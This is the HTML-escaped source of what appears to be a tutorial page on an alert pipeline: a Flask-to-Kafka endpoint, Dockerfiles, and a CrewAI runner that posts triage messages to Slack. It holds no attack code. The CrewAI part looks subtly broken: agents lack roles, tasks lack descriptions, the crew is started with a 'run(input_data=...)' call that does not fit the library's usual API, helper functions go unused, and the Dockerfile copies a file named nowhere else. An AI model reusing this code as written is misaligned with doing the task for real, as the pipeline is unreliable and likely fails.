&lt;h3&gt;🌐 &lt;code class=&quot;language-text&quot;&gt;alert_api/app.py&lt;/code&gt; (Flask → Kafka)&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; flask &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; Flask&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; request
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; kafka &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; KafkaProducer
&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; os&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; json&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; logging

logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;basicConfig&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;level&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;INFO&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

producer &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; KafkaProducer&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
    bootstrap_servers&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;os&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;getenv&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;KAFKA_BOOTSTRAP_SERVER&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;localhost:9092&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    value_serializer&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;lambda&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; json&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;dumps&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;v&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;encode&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;utf-8&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

app &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Flask&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;__name__&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token decorator annotation punctuation&quot;&gt;@app&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;route&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;/alert&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; methods&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;POST&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;alert&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        data &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; request&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;get_json&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;info&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;Received alert: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        producer&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;send&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;raw_alerts&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; data&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;status&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;ok&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;200&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;except&lt;/span&gt; Exception &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; e&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;Kafka send failed: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;e&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;error&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;str&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;e&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;500&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; __name__ &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;__main__&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    app&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;run&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;host&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;0.0.0.0&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; port&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;5000&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;hr&gt;
&lt;h3&gt;🐳 &lt;code class=&quot;language-text&quot;&gt;alert_api/Dockerfile&lt;/code&gt;&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;docker&quot;&gt;&lt;pre class=&quot;language-docker&quot;&gt;&lt;code class=&quot;language-docker&quot;&gt;&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; python:3.10-slim&lt;/span&gt;

&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;WORKDIR&lt;/span&gt; /app&lt;/span&gt;
&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;COPY&lt;/span&gt; app.py .&lt;/span&gt;

&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;RUN&lt;/span&gt; pip install flask kafka-python&lt;/span&gt;

&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CMD&lt;/span&gt; [&lt;span class=&quot;token string&quot;&gt;&quot;python&quot;&lt;/span&gt;, &lt;span class=&quot;token string&quot;&gt;&quot;app.py&quot;&lt;/span&gt;]&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;🤖 CrewAI Runner&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; os&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; json&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; logging
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; kafka &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; KafkaConsumer
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; slack_sdk &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; WebClient
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; crewai &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; Agent&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Task&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Crew
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; slack_sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;errors &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; SlackApiError
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; dotenv &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; load_dotenv

load_dotenv&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;basicConfig&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;level&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;INFO&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

slack &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; WebClient&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;token&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;os&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;getenv&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;SLACK_BOT_TOKEN&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
channel &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; os&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;getenv&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;SLACK_CHANNEL_ID&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;triage_task&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;alert&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;🧠 Triage: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;alert&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;summary&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt; — *&lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;alert&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;get&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;urgency&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;medium&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;* urgency.&quot;&lt;/span&gt;&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;comms_task&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;alert&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;📢 Update: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;alert&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;summary&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;. Engineers are investigating.&quot;&lt;/span&gt;&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;def&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;runbook_task&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;alert&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;🔧 Restart `&lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;alert&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;get&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;instance&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;unknown&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;` using [Runbook #42](https://runbooks.myorg.dev/42).&quot;&lt;/span&gt;&lt;/span&gt;

triage_agent &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Agent&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;TriageBot&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; goal&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Classify severity&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; backstory&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Knows alert patterns.&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
comms_agent &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Agent&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;CommsBot&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; goal&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Write updates&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; backstory&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Keeps teams informed.&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
runbook_agent &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Agent&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;RunbookBot&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; goal&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Suggest fixes&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; backstory&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Knows infra patterns.&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

tasks &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
    Task&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Triage alert&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; agent&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;triage_agent&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Task&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Write Slack update&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; agent&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;comms_agent&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Task&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Suggest remediation&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; agent&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;runbook_agent&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;

crew &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Crew&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;agents&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;triage_agent&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; comms_agent&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; runbook_agent&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; tasks&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;tasks&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

consumer &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; KafkaConsumer&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
    &lt;span class=&quot;token string&quot;&gt;&apos;enriched_alerts&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    bootstrap_servers&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;os&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;getenv&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;KAFKA_BOOTSTRAP_SERVER&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;localhost:9092&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    value_deserializer&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;lambda&lt;/span&gt; m&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; json&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;loads&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;m&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;decode&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;utf-8&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; msg &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; consumer&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    alert &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; msg&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;value
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;not&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;all&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;k &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; alert &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; k &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;summary&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;urgency&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;instance&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;warning&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;⚠️ Malformed alert: skipping&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;continue&lt;/span&gt;
    responses &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; crew&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;run&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;input_data&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;alert&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;try&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        slack&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;chat_postMessage&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;channel&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;channel&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; text&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;\n&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;join&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;responses&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;info&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;✅ Slack notification sent&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;except&lt;/span&gt; SlackApiError &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; e&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        logging&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;error&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string-interpolation&quot;&gt;&lt;span class=&quot;token string&quot;&gt;f&quot;❌ Slack error: &lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;e&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;response&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;error&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;🤖 &lt;code class=&quot;language-text&quot;&gt;crewai_runner/Dockerfile&lt;/code&gt;&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;docker&quot;&gt;&lt;pre class=&quot;language-docker&quot;&gt;&lt;code class=&quot;language-docker&quot;&gt;&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; python:3.10-slim&lt;/span&gt;

&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;WORKDIR&lt;/span&gt; /app&lt;/span&gt;

&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;COPY&lt;/span&gt; agent_runner.py .&lt;/span&gt;

&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;RUN&lt;/span&gt; pip install kafka-python slack_sdk crewai openai python-dotenv&lt;/span&gt;

&lt;span class=&quot;token instruction&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CMD&lt;/span&gt; [&lt;span class=&quot;token string&quot;&gt;&quot;python&quot;&lt;/span&gt;, &lt;span class=&quot;token string&quot;&gt;&quot;agent_runner.py&quot;&lt;/span&gt;]&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
